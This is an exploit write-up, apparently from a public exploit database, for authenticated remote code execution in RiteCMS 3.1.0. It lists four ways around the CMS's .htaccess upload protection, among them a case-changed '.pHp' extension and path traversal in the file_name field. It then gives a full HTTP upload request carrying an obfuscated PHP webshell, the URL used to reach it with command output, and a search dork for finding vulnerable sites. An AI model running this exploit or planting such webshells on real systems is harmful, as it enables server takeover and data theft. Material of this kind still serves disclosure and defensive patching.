RiteCMS 3.1.0 Shell Upload / Remote Code Execution

`# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)  
# Date: 25/07/2021  
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)  
# Vendor Homepage: https://ritecms.com/  
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip  
# Version: <= 3.1.0  
# Tested on: Windows 10, Ubuntu 18, XAMPP  
# Google Dork: intext:"Powered by RiteCMS"  
# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597  
  
  
"""  
################  
# Description #  
################  
  
# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default.  
# There are 4 ways of bypassing the current file upload protection to achieve remote code execution.  
  
# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved  
  
# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved  
  
# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved  
By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability.  
Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root  
  
body= Content-Disposition: form-data; name="file_name"  
body= ../webrootExec.php  
  
So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php  
  
# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved  
  
$ cat .htaccess  
  
<Files *.php>  
deny from all  
</Files>  
  
<Files ~ "webshell\.php$">  
Allow from all  
</Files>  
  
  
###################################  
# PoC for webshell using Method 2 #  
###################################  
  
Steps to Reproduce:  
  
1. Login as admin  
2. Go to Files Manager   
3. Choose a directory to upload .php file either media or files directory.   
4. Then, click Upload file > Browse..   
3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess  
4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory  
  
Request:  
========  
  
POST /ritecms.v3.1.0/admin.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309  
Content-Length: 1744  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media  
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Sec-GPC: 1  
  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="mode"  
  
filemanager  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="file"; filename="webshell.pHp"  
Content-Type: application/octet-stream  
  
<?php system($_GET[base64_decode('Y21k')]);?>  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="directory"  
  
media  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="file_name"  
  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="upload_mode"  
  
1  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="resize_xy"  
  
x  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="resize"  
  
640  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="compression"  
  
80  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="thumbnail_resize_xy"  
  
x  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="thumbnail_resize"  
  
150  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="thumbnail_compression"  
  
70  
-----------------------------410923806710384479662671954309  
Content-Disposition: form-data; name="upload_file_submit"  
  
OK - Upload file  
-----------------------------410923806710384479662671954309--  
  
  
####################  
# Webshell access: #  
####################  
  
# Webshell access via:  
PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id  
  
# Output:  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
  
"""  
`